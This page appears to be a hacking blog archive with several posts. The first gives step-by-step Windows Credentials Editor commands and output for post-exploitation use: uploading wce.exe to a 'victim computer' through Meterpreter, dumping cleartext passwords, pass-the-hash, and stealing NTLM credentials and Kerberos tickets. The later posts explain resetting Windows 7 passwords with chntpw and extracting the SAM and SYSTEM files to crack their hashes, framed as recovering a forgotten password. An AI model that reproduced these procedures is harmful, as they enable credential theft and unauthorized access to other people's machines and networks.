Showing posts with label windows7 password crack. Show all posts
Showing posts with label windows7 password crack. Show all posts

How to get windows passwords in plain text?


Windows Credentials Editor (WCE) is a security tool that allows to list Windows logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes, Kerberos tickets and cleartext passwords).

The tool allows users to:
  • Perform Pass-the-Hash on Windows
  • 'Steal' NTLM credentials from memory (with and without code injection)
  • 'Steal' Kerberos Tickets from Windows machines
  • Use the 'stolen' kerberos Tickets on other Windows or Unix machines to gain access to systems and services
  • Dump cleartext passwords stored by Windows authentication packages
WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing.
After hack remote computer upload wce to victim computer using metasploit
(1)Type following command in meterpreter session.
Upload /pentest/passwords/wce/wce.exe .
(2)Now type shellto get cmd of victim pc
(3)Type wce.exe -wto get password in clear text


List NTLM credentials in memory?


By default, WCE lists NTLM credentials in memory, no need to specify any options.
For example:
C:\Users\test>wce.exe

How to Change my current NTLM credentials?


wce.exe -s <username>:<domain>:<lmhash>:<nthash>
For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
Changing NTLM credentials of current logon session (00024E1Bh) to:
Username: testuser
domain: amplialabs
LMHash: 01FC5A6BE7BC6929AAD3B435B51404EE
NTHash: 0CB6948805F797BF2A82807973B89537
NTLM credentials successfully changed!



How to Create a new logon session and launch a program with new NTLM credentials?

wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program>
For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 -c cmd.exe


How to generate NTLM hashes with WCE? 

wce.exe -g <cleartext password>
For example:
C:\Users\test>wce.exe -g mypassword
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Password: mypassword
Hashes: 74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC1209FF0E7 

If you want to know more about how its work , Download P.D.F. file from Below.
(1)P.D.F -1
(2)P.D.F.-2

If you only need clear text password not logon sessions and any other
you can use mimikatz to get clear text password.


How to Recover Windows 7 password in ubuntu?


(1)First boot from Ubuntu O.S from live cd.

(2)Open Ubuntu Software Center . Search for CHNTPW . Install package. If you donot have internet  connection on password lost pc then download from  here.

(3)now open terminal. & type following command    
 cd /media/"drive name of windows 7 partion"/Windows /System32/config
please use your drive name of partion in which windows 7 is installed without quote.

(4)now type  sudo chntpw SAM . AND press ENTER. NOW press 1. & restart pc.


        

How To Recover Windows 7 password?


Here is the Tutorial how recover forgotten password of xp,vista, win 7?

(1)First you have to boot from another O.S like ubuntu, back track or any other which come in live cd format.Run O.S from cd.( you can also run O.S from pendrive ,it`s faster than cd)

(2)Copy "sam" & "system" file from this location C:/WINDOWS/SYSTEM 32/CONFIG (this files contain your password in NTML hash form) and save it in your pendrive.


(3)Now  We Want to get hashes from this file , there are different types of software available based on O.S. For windows i recommended  you "sam inside" .It`s easy to use. Download from here.

(4)Now you need other computer to run this file ,because it`s windows compatible program, so copy this "sam" & "system" file &this program in pendrive.

(5)Now open pendrive in your friend`s computer who has windows . Unzip sam inside & run the program.

(6)Now Import sam & system file in this software. it will show you username & passwords in hashes  form.

(7)now next step is to crack hashes. for this purpose you can use tools or online hash cracker.HERE is the   LIST OF ONLINE HASH CRACKER.(please view NTML HASH CRACKER).If you cannot crack online you should use tools like john the ripper , cain & able etc.

BUT IF YOU CANNOT DO THAT , THEN EASY WAY IS DOWNLOAD Ophacrack iso file form here. Burn into a cd and reboot pc. IT will do automatically for you.

still you cannot do this send me sam & system file , i will give you password. :)